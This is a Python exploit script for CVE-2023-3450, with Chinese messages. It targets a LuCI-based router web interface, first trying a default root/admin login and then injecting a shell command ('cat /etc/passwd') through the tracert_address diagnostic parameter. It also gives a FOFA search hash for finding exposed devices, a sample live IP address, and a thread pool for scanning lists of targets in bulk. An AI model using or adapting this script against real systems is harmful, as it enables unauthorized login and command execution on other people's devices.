# -*- coding:utf-8 -*-
import argparse, sys, base64, requests
import re
from multiprocessing.dummy import Pool

requests.packages.urllib3.disable_warnings()


# fofa：icon_hash="-399311436"
# 案例：http://123.54.231.201:6060

def banner():
    content = '''


 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██╗  ██╗███████╗ ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗██║  ██║██╔════╝██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝███████║███████╗██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗╚════██║╚════██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝     ██║███████║╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝      ╚═╝╚══════╝ ╚═════╝ 
                                                                                                    

    '''
    print(content)


def poc(target):
    url = target + '/cgi-bin/luci?u=root&p=admin&_=0.8260737660449504'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate'
    }
    try:
        res = requests.get(url, headers=headers, verify=False, timeout=5).text
        if 'ok' in res:
            print(f'[+]{target}登录成功')
            with open('result.txt', 'a+', encoding='utf-8') as f:
                f.write(target + '\n')
                return True
        else:
            print(f'[-]{target}登陆失败')
            return False
    except:
        print(f'[-]{target}无法进入')


def exp(target):
    url = target + '/cgi-bin/luci/;stok=b3bafdbb03f0dfcf96bef095f6060d64/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate',
        'Cookie': 'sysauth=2c695fe03878d9a754730dce32bfd4ca'
    }
    res = requests.get(url, headers=headers, verify=False, timeout=5).text
    if 'root' in res:
        print(f'[+]{target}有命令执行漏洞')
        print(re.findall('msg":"(.*?)"',res))
    else:
        print(f'[-]{target}没有命令执行漏洞')


def main():
    banner()
    parser = argparse.ArgumentParser(description='CVE-2023-3450')
    parser.add_argument('-u', '--url', dest='url', type=str, help='example:http://example.com')
    parser.add_argument('-f', '--file', dest='file', type=str, help='url.txt')

    args = parser.parse_args()
    if args.url and not args.file:
        if poc(args.url):
            exp(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file, 'r', encoding='utf-8') as f:
            for url in f.readlines():
                url_list.append(url.strip().replace('\n', ''))
            mp = Pool(10)
            mp.map(poc, url_list)
            mp.close()
            mp.join()
    else:
        print(f'Usage:\n\tpython3 {sys.argv[0]} -h')


if __name__ == '__main__':
    main()